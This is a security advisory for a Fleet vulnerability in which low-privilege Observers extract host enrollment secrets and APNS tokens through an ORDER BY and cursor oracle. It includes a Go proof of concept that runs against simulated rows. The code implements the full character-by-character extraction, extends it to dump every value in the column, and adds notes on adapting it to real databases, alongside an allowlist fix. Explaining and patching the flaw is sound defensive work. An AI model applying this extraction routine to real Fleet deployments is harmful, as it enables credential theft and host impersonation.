CVE-2026-46371
Fleet: Observer-level enrollment secret extraction via ORDER BY oracle on Apple MDM commands endpoint
Description
### Summary

A vulnerability in Fleet's Apple MDM commands listing endpoint allowed authenticated users holding the lowest-privilege Observer role to extract sensitive values from database tables joined into the endpoint's query, including host enrollment secrets and Apple Push Notification Service (APNS) tokens, through a cursor-based binary-search oracle. The endpoint accepted a user-supplied `order_key` parameter that was not validated against a column allowlist.

### Impact

The `GET /api/v1/fleet/mdm/apple/commands` endpoint built its query with a deprecated helper that did not restrict which columns could appear in the `ORDER BY` clause. Because the underlying query joins the `hosts` and `nano_enrollments` tables, any column of those tables could be supplied as `order_key`. An attacker with Observer credentials could then combine this with the cursor-based pagination parameter (`after`) to binary-search the value of the chosen column one character at a time. The targeted values never appeared in the response body, but whether a probe returned any results revealed whether the secret sorted after the supplied cursor, and a number of probes on the order of log2 of the alphabet size is enough to fix each character.

With extracted `node_key` or `orbit_node_key` values, an attacker could impersonate enrolled hosts to Fleet's osquery and Orbit endpoints, submit fabricated host data, and retrieve pending scripts and commands. The APNS values are exploitable only by a party that also possesses the organization's APNS certificate.

Exploitation required authenticated Observer access and a Fleet deployment with Apple MDM enabled and at least one queued MDM command. Instances without Apple MDM configured were not affected.
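The oracle described above, worked through as an added example in Go (Fleet's own language). This is not Fleet's code and not the reporter's exploit: it simulates the endpoint with constructed in-memory rows and assumes the keyset cursor is applied as `WHERE <order_key> > ?` (the advisory does not spell out the real query's cursor semantics), then recovers the joined-in `node_key` values one character at a time using nothing but the number of rows each response contains. It goes one step beyond the advisory's single-value description: by thresholding the row count it pulls every value of the column, largest first. The page names `order_key`, `after`, `node_key`, `hosts` and `nano_enrollments`; the column name `push_token`, the sample values, the base62 alphabet and the `allowedOrderKeys` allowlist are assumptions made for the example.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// row is a constructed stand-in for one command row joined with hosts and
// nano_enrollments (column name -> value). Only command_uuid and status are
// meant to be exposed; the other values are invented sample data, not secrets.
type row map[string]string

var sampleRows = []row{
	{"command_uuid": "cmd-1", "status": "Pending", "node_key": "nK7q2Zt9Pa", "push_token": "apnsAAA1"},
	{"command_uuid": "cmd-2", "status": "Pending", "node_key": "B3xYz01Lm", "push_token": "apnsBBB2"},
}

// apiCommand is all the caller ever sees; secret columns never appear in it.
type apiCommand struct{ CommandUUID, Status string }

// listCommandsVulnerable models the flawed endpoint: orderKey goes straight
// into ORDER BY and the keyset cursor becomes "WHERE <orderKey> > ?", with
// no allowlist, so any joined column can serve as the sort/cursor key.
func listCommandsVulnerable(orderKey, after string) ([]apiCommand, error) {
	var out []apiCommand
	for _, r := range sampleRows {
		v, ok := r[orderKey]
		if !ok {
			return nil, errors.New("unknown column: " + orderKey) // as the DB would
		}
		if v > after { // byte-wise; a case-insensitive collation would differ
			out = append(out, apiCommand{r["command_uuid"], r["status"]})
		}
	}
	return out, nil
}

// listCommandsHardened shows the shape of the fix (illustrative, not Fleet's
// code): order_key must name a column the endpoint intends to sort by.
var allowedOrderKeys = map[string]bool{"command_uuid": true, "status": true}

func listCommandsHardened(orderKey, after string) ([]apiCommand, error) {
	if !allowedOrderKeys[orderKey] {
		return nil, fmt.Errorf("invalid order_key %q", orderKey)
	}
	return listCommandsVulnerable(orderKey, after)
}

// ---- attacker side: only the number of returned rows is observed ----
// alphabet is the character set assumed for the target column, in byte order.
const alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

// pad sorts after every alphabet character and is longer than any secret, so
// "value > prefix+c+pad" holds exactly when value's next character is > c.
var pad = strings.Repeat("~", 64)

// countAfter is the oracle: how many rows sort after the cursor on the chosen
// column. Errors (e.g. a bad column name) count as zero rows.
func countAfter(column, after string) int {
	res, err := listCommandsVulnerable(column, after)
	if err != nil {
		return 0
	}
	return len(res)
}

// extractKth recovers the k-th largest value of column (k=1 is the maximum)
// one character at a time. "At least k rows sort after X" is monotone in X,
// so each character costs about log2(len(alphabet)) requests.
func extractKth(column string, k int) string {
	atLeastK := func(x string) bool { return countAfter(column, x) >= k }
	prefix := ""
	for atLeastK(prefix) { // false once prefix equals the whole value
		lo, hi := 0, len(alphabet)-1 // invariant: next char >= alphabet[lo]
		for lo < hi {
			mid := (lo + hi + 1) / 2
			if atLeastK(prefix + string(alphabet[mid-1]) + pad) { // next char > alphabet[mid-1]
				lo = mid
			} else {
				hi = mid - 1
			}
		}
		prefix += string(alphabet[lo])
	}
	return prefix
}

func main() {
	n := countAfter("node_key", "")
	for k := 1; k <= n; k++ {
		fmt.Printf("node_key #%d: %s\n", k, extractKth("node_key", k))
	}
	if _, err := listCommandsHardened("node_key", ""); err != nil {
		fmt.Println("hardened endpoint:", err)
	}
}
```

Two caveats for anyone reproducing this against a real database rather than the in-memory model: string comparison there follows the column's collation, and a case-insensitive collation (common MySQL defaults) would make the byte-ordered alphabet above misjudge letter case, so the alphabet and the comparison step have to match the collation; and a `limit` parameter, if the endpoint has one, caps the count the oracle sees, so the k-th-largest extension only reaches values within that window. The fix itself is the allowlist check in `listCommandsHardened`: once `order_key` can only name columns the endpoint means to sort by, the joined secret columns are unreachable regardless of how the cursor is applied.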
### Workarounds

If an immediate upgrade is not possible, administrators should:

- Restrict the Observer role to fully trusted users until the patch is applied
- Rotate `node_key` and `orbit_node_key` for any host suspected of exposure by re-enrolling the affected hosts

### For more information

If there are any questions or comments about this advisory:

- Email Fleet at [email protected]
- Join #fleet in [osquery Slack](https://join.slack.com/t/osquery/shared_invite/zt-h29zm0gk-s2DBtGUTW4CFel0f0IjTEw)

### Credits

Fleet thanks the Security Team at Palantir Technologies for responsibly reporting this issue.
How to fix CVE-2026-46371
To remediate CVE-2026-46371, upgrade Fleet to a fixed version listed below.
- Fleet: upgrade to 4.84.2 or later